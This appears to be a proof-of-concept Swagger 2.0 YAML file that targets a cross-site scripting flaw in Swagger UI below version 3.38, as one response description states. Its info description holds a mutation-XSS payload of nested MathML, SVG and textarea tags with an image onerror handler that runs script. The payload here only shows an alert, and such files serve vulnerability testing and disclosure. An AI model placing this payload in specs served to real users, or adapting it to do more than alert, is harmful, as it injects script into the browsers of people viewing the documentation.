swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(String.fromCharCode(88,83,83,40,41))'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: XSS Swagger UI < 3.38
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
